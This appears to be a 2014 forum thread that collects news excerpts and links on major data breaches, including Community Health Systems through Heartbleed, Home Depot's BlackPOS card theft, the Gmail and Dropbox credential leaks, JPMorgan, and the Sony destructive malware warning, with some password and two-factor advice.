2014-08-20, 15:38

Breach at Community Health Systems - data on 4.5M stolen in cyber attack
- http://www.reuters.com/article/2014/08/18/us-community-health-cybersecurity-idUSKBN0GI16N20140818
Aug 18, 2014 - "U.S. hospital operator Community Health Systems Inc said on Monday personal data, including patient names and addresses, of about 4.5 million people were stolen by hackers from its computer network, likely in April and June. The company said the data, considered protected under the Health Insurance Portability and Accountability Act, included patient names, addresses, birth dates, telephone numbers and Social Security numbers. It did not include patient credit card or medical information, Community Health Systems said in a regulatory filing. It said the security breach had affected about 4.5 million people who were referred for or received services from doctors affiliated with the hospital group in the last five years. The FBI warned healthcare providers in April that their cybersecurity systems were lax compared to other sectors, making them vulnerable to hackers looking for details that could be used to access bank accounts or obtain prescriptions... The company said it and its security contractor, FireEye Inc unit Mandiant, believed the attackers originated from China. They did not provide further information about why they believed this was the case. They said they used -malware- and other technology to copy and transfer this data and information from its system..."

- https://www.trustedsec.com/august-2014/chs-hacked-heartbleed-exclusive-trustedsec/
Aug 19, 2014 - "... a breach at Community Health Systems (CHS) affecting an estimated 4.5 million patients was recently revealed. TrustedSec obtained the first details on how the breach occured and new information relating to this breach. The initial attack vector was through the infamous OpenSSL “heartbleed” vulnerability which led to the compromise of the information... This is the first confirmed breach of its kind where the heartbleed bug is the known initial attack vector that was used..."

- http://www.reuters.com/article/2014/08/20/us-community-health-cybersecurity-idUSKBN0GK0H420140820
Aug 20, 2014 - "... Heartbleed is a major bug in OpenSSL encryption software that is widely used to secure websites and technology products including mobile phones, data center software and telecommunications equipment. It makes systems vulnerable to data theft by hackers who can attack them without leaving a trace..."


2014-09-02, 20:28

Credit Card breach at Home Depot ...
- http://krebsonsecurity.com/2014/09/banks-credit-card-breach-at-home-depot/
Sep 2, 2014 - "Multiple banks say they are seeing evidence that Home Depot stores may be the source of a massive new batch of stolen credit and debit cards that went on sale this morning in the cybercrime underground. Home Depot says that it is working with banks and law enforcement agencies to investigate reports of suspicious activity. Contacted by this reporter about information shared from several financial institutions, Home Depot spokesperson Paula Drake confirmed that the company is investigating. “I can confirm we are looking into some unusual activity and we are working with our banking partners and law enforcement to investigate,” Drake said... There are signs that the perpetrators of this apparent breach may be the same group of Russian and Ukrainian hackers responsible for the data breaches at Target, Sally Beauty and P.F. Chang’s, among others. The banks contacted by this reporter all purchased their customers’ cards from the same underground store – rescator[dot]cc — which on Sept. 2 moved two massive new batches of stolen cards onto the market:
A massive new batch of cards labeled “American Sanctions” and “European Sanctions” went on sale Tuesday, Sept. 2, 2014
> http://krebsonsecurity.com/wp-content/uploads/2014/09/americansanctions.png
... this crime shop has named its newest batch of cards “American Sanctions.” Stolen cards issued by European banks that were used in compromised US store locations are being sold under a new batch of cards labled “European Sanctions.” It is not clear at this time how many stores may be impacted, but preliminary analysis indicates the breach may extend across all 2,200 Home Depot stores in the United States. Home Depot also operates some 287 stores outside the U.S. including in Canada, Guam, Mexico, and Puerto Rico. This is likely to be a fast-moving story with several updates as more information becomes available. Stay tuned.
Update: 1:50 p.m. ET: Several banks contacted by this reporter said they believe this breach may extend back to late April or early May 2014. If that is accurate — and if even a majority of Home Depot stores were compromised — this breach could be many times larger than Target, which had 40 million credit and debit cards stolen over a three-week period."

- http://www.bloomberg.com/news/print/2014-09-02/home-depot-shares-drop-after-retailer-investigates-data-breach.html
Sep 2, 2014

- https://atlas.arbor.net/briefs/index#908540839
High Severity
11 Sep 2014

Home Depot hit by same Malware as Target
- http://krebsonsecurity.com/2014/09/home-depot-hit-by-same-malware-as-target/
Sep 7, 2014 - "... new -variant- of the same malicious software program that stole card account data from cash registers at Target last December..."
> http://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/

- http://www.reuters.com/article/2014/09/08/us-usa-home-depot-databreach-idUSKBN0H327E20140908
Sep 8, 2014 - "... Home Depot Inc confirmed on Monday that its payment security systems have been breached, which could impact customers using payment cards at its stores in the United States and Canada. Home Depot, however, said it has found no evidence that personal identification numbers (PINs) have been compromised, it said in a statement*..."
* http://phx.corporate-ir.net/phoenix.zhtml?c=63646&p=RssLanding&cat=news&id=1964976
Sep 8, 2014

- http://blog.trendmicro.com/trendlabs-security-intelligence/home-depot-breach-linked-to-blackpos-malware/
Sep 9, 2014


2014-09-11, 01:05

5 million GMail accounts hacked
- http://money.cnn.com/2014/09/10/technology/security/gmail-hack/
Sep 10, 2014

- http://www.webroot.com/blog/2014/09/10/5-million-gmail-accounts-breached-one/
Sep 10, 2014 - "... This morning, we found out that there was a breach of over 5 million Gmail accounts, all hosted in a plain text file on Russian hacker forums. Naturally, we wanted to see what the data was like, and there it was, plain as day for everyone to see. We started to look up our various accounts, and out of my whole team, I was the only one to appear. Right in front of me, on a list with 5 million other people, was my information.... Every three months is the average for a company for changing of passwords, often not allowing you to repeat for at least 10 passwords. This may be an annoyance, but with breaches like this occurring on a daily basis, it’s a necessary step that you should be following at home as well. It’s no longer simply about someone figuring your password out, but rather the idea that any level of breach can grab your standard password and e-mail address, and attempt it across multiple channels until success is found. Changing your password removes this ability... With cell phones being at the ready in almost all aspects of our daily lives, this is one of the most convenient and easy layers to implement. By adding this layer, the service will authenticate any login attempt through an independent channel, allowing you to know if someone is attempting unauthorized access. Below are links to the sites listed above for their steps on enabling this step.
Gmail: https://www.google.com/landing/2step/
Amazon: http://aws.amazon.com/iam/details/mfa/
PayPal: https://www.paypal.com/us/cgi-bin?cmd=xpt/Marketing_CommandDriven/securitycenter/PayPalSecurityKey-outside&bn_r=o
Facebook: https://www.facebook.com/note.php?note_id=10150172618258920
Twitter: https://blog.twitter.com/2013/getting-started-with-login-verification
While we are still unsure how the hacker was able to get all this information, it’s clear as day that it is out there, and because of that, vigilance is key. Just as you wouldn’t leave your credit cards laying around, you shouldn’t risk your passwords being out there either. Data is valuable, and the more private or financially focused it is, the more we need to take it seriously. So take these simple steps, get another layer of security established, and make it a habit to change passwords so you don’t become another name on the list as I did. In the mean time, you can check and see if your e-mail is apart of the breach by following this link:
- https://isleaked.com/en.php

Google Two-Step authentication: https://support.google.com/a/answer/175197?hl=en

- http://www.theinquirer.net/inquirer/news/2364644/google-dismisses-all-but-two-percent-of-gmail-password-dump
Sep 11 2014 - "... Google talked about "credential dumps"*, which is described as the uploading of a lot of usernames and passwords on the web. It called them a 'recent phenomenon', adding that it regularly scans them for evidence of impact. It said that a recent leak from earlier this week, which was thought to include data from around five million Google and other provider email accounts, had a failure rate of around 98 percent, meaning that fewer than two out of every hundred credentials could be used... The firm took the opportunity to remind people that they probably use the same login credentials on a range of websites and that this is like bathing in gasoline while smoking a pipe..."
* http://googleonlinesecurity.blogspot.com.es/2014/09/cleaning-up-after-password-dumps.html


2014-09-19, 13:26

Home Depot breach - 56 million cards ...
- http://www.reuters.com/article/2014/09/18/us-home-depot-dataprotection-idUSKBN0HD2J420140918
Sep 18, 2014 - "Home Depot Inc Thursday said some 56 million payment cards were likely compromised in a cyberattack at its stores, suggesting the hacking attack at the home improvement chain was larger than last year's unprecedented breach at Target Corp. Home Depot, in providing the first clues to how much the breach would cost, said that so far it has estimated costs of $62 million. But it indicated that costs could reach much higher. It will take -months- to determine the full scope of the fraud, which affected Home Depot stores in both the United States and Canada and ran from April to September. Retailer Target incurred costs of $148 million in its second fiscal quarter related to its breach. Target hackers stole at least 40 million payment card numbers and 70 million other pieces of customer data. Home Depot said that criminals used unique, custom-built software that had not been seen in previous attacks and was designed to evade detection in its most complete account of what had happened since it first disclosed the breach on Sept. 8. The company said that the hackers’ method of entry has been closed off, the malware eliminated from its network, and that it had rolled out "enhanced encryption of payment data" to all U.S. stores... Of the estimated cost so far of $62 million, which covers such items as credit monitoring, increased call center staffing, and legal and professional services, Home Depot said it believes that $27 million of the amount will be paid for by insurers. But the company said it has not yet estimated the impact of "probable losses" related to the possible need to reimburse banks for fraud and card replacement, as well as covering costs of lawsuits and government investigations... Criminals have frequently used software that evades detection, but retailers are expected to closely monitor their networks using tools that are designed to uncover signs of a crime in progress..."

- http://www.reuters.com/article/2014/11/07/us-home-depot-dataprotection-idUSKBN0IQ2L120141107
Nov 6, 2014 - "... Criminals used a third-party vendor's user name and password to enter the perimeter of its network, Home Depot said in a statement on Thursday. The hackers then acquired "elevated rights" that allowed them to navigate parts of Home Depot's network and to deploy unique, custom-built malware on its self-checkout systems in the U.S. and Canada, according to the company. Home Depot said the stolen credentials did not alone provide direct access to the company's point-of-sale devices. Since September, the company has implemented enhanced encryption of payment data in all U.S. stores and said the rollout to Canadian stores will be completed by early 2015. This, however, was "really lipstick on a pig" and the proper solution was to add chip and PIN, or EMV technology, to U.S. credit cards, said David Campbell, chief security officer at SendGrid, a cloud-based email delivery service. Home Depot said it was already rolling out the EMV technology*..."
* https://en.wikipedia.org/wiki/EMV


2014-10-03, 13:20

JPMorgan hack exposed data of 83 million ...
- http://www.reuters.com/article/2014/10/02/jpmorgan-cybersecurity-idUSL3N0RX3K620141002
Oct 2, 2014 - "Names, addresses, phone numbers and email addresses of the holders of some 83 million households and small business accounts were exposed when computer systems at JPMorgan Chase & Co were recently compromised by hackers, making it one of the biggest data breaches in history. The bank revealed the scope of the previously disclosed breach on Thursday, saying that there was no evidence that account numbers, passwords, user IDs, birth dates or Social Security numbers had been stolen. It added that it has not seen "unusual customer fraud" related to the attack which exposed contact information for 76 million households and 7 million small businesses. The people affected are mostly account holders, but may also include former account holders and others who entered their contact information at the bank’s online and mobile sites, according to a bank spokeswoman. Security experts outside of the bank warned that the breach could result in an increase in crime as scammers will likely attempt to use the stolen information to engage in various types of fraud. The bank's customers should be on heightened alert for fraud, said Mark Rasch, a former federal cyber crimes prosecutor... At the end of August, JPMorgan said it was working with U.S. law enforcement authorities to investigate a possible cyber attack. As with home break-ins, it can take victims of data attacks months to discover what, if anything, is missing..."

States probe JPMorgan Chase as hack seen fueling fraud
- http://www.reuters.com/article/2014/10/03/us-jpmorgan-cybersecurity-idUSKCN0HS1ST20141003
Oct 3, 2014 - "Two U.S. states are investigating the theft of 83 million customer records from JPMorgan Chase in a massive cyber attack uncovered over the summer, and more may soon join... Illinois Attorney General Lisa Madigan said she has launched a probe into the hack on the No. 1 U.S. bank by assets. Connecticut is also investigating, said a person familiar with the matter who was not authorized to publicly discuss the probe... Special Assistant Attorney General William Brauch, director of the Iowa Department of Justice’s Consumer Protection Division, told Reuters that other states attorneys general are discussing the matter and could launch a joint investigation... News of the actions by the states emerged a day after the bank said in a regulatory filing that customer names, addresses, phone numbers and email addresses were taken in the attack that the bank said surfaced in August. It added that it was continuing to investigate the matter and that customers would -not- be liable for any unauthorized transactions that were promptly reported to the bank... cybercrime experts warned that the hack could fuel years of fraud, as criminals use the stolen data to "phish" for customer passwords and ferret out other consumer accounts..."

- http://atlas.arbor.net/briefs/index#364889606
Elevated Severity
9 Oct 2014


2014-10-14, 12:48

Dropbox passwords leaked
- http://www.reuters.com/article/2014/10/14/us-cybercrime-dropbox-idUSKCN0I309Z20141014
Oct 14, 2014 - "Hundreds of alleged usernames and passwords for online document-sharing site Dropbox were published on Monday on Pastebin, an anonymous information-sharing website. The anonymous user, who claims to have hacked close to 7 million accounts, is calling for Bitcoin donations to fund the operation... Dropbox, however, said it has -not- been hacked. "These usernames and passwords were unfortunately -stolen- from other services and used in attempts to log in to Dropbox accounts. We'd previously detected these attacks and the vast majority of the passwords posted have been expired for some time now. All other remaining passwords have been expired as well," a Dropbox spokesman said in an email to Reuters. Dropbox is a Silicon Valley startup that has proved a hit with consumers and boasts more than 200 million users six years after it was started..."

- http://www.theinquirer.net/inquirer/news/2375519/dropbox-denies-it-was-hacked-as-7-million-passwords-leak-online
Oct 14 2014 - "... The company said* that, if any leak has occurred, it came from a third-party app and if anyone does happen to be using the same password across services, it is still likely to be very out of date as the company now uses a token API rather than a text-in-the-clear system. At present, the hackers are dripfeeding the user names and passwords they claim to have harvested into Pastebin documents and are appealing for bitcoin donations to reveal more..."

* https://blog.dropbox.com/2014/10/dropbox-wasnt-hacked/
Oct 13, 2014 - "Recent news articles claiming that Dropbox was hacked aren’t true. Your stuff is safe. The usernames and passwords referenced in these articles were stolen from unrelated services, not Dropbox. Attackers then used these stolen credentials to try to log in to sites across the internet, including Dropbox. We have measures in place to detect suspicious login activity and we automatically reset passwords when it happens. Attacks like these are one of the reasons why we strongly encourage users not to reuse passwords across services. For an added layer of security, we always recommend enabling 2 step verification on your account.
Update: 10/14/2014 12:30am PT
A subsequent list of usernames and passwords has been posted online. We’ve checked and these are not associated with Dropbox accounts."


2014-12-02, 05:07

FBI warns of 'destructive' malware in wake of Sony attack
- http://www.reuters.com/article/2014/12/02/us-sony-cybersecurity-malware-idUSKCN0JF3FE20141202
Dec 1, 2014 - "The Federal Bureau of Investigation warned U.S. businesses that hackers have used malicious software to launch a destructive cyberattack in the United States, following a devastating breach last week at Sony Pictures Entertainment. Cybersecurity experts said the malicious software described in the alert appeared to describe the one that affected Sony, which would mark first major destructive cyber attack waged against a company on U.S. soil. Such attacks have been launched in Asia and the Middle East, but none have been reported in the United States. The FBI report did not say how many companies had been victims of destructive attacks... The five-page, confidential "flash" FBI warning issued to businesses late on Monday provided some technical details about the malicious software used in the attack. It provided advice on how to respond to the malware and asked businesses to contact the FBI if they identified similar malware. The report said the malware overrides all data on hard drives of computers, including the master boot record, which prevents them from booting up... The FBI released the document in the wake of last Monday's unprecedented attack on Sony Pictures Entertainment, which brought corporate email down for a week and crippled other systems as the company prepares to release several highly anticipated films... The FBI said it is investigating the attack with help from the Department of Homeland Security. Sony has hired FireEye's Mandiant incident response team to help clean up after the attack, a move that experts say indicates the severity of the breach. While the FBI report did not name the victim of the destructive attack in its bulletin, two cybersecurity experts who reviewed the document said it was clearly referring to the breach at the California-based unit of Sony Corp... Hacks used malware similar to that described in the FBI report to launch attacks on businesses in highly destructive attacks in South Korea and the Middle East, including one against oil producer Saudi Aramco that knocked out some 30,000 computers. Those attacks are widely believed to have been launched by hackers working on behalf of the governments of North Korea and Iran. Security experts said that repairing the computers requires technicians to manually either replace the hard drives on each computer, or re-image them, a time-consuming and expensive process..."

- http://www.latimes.com/entertainment/envelope/cotown/la-et-ct-sony-hack-20141201-story.html
Dec 1, 2014

:fear::fear: :mad: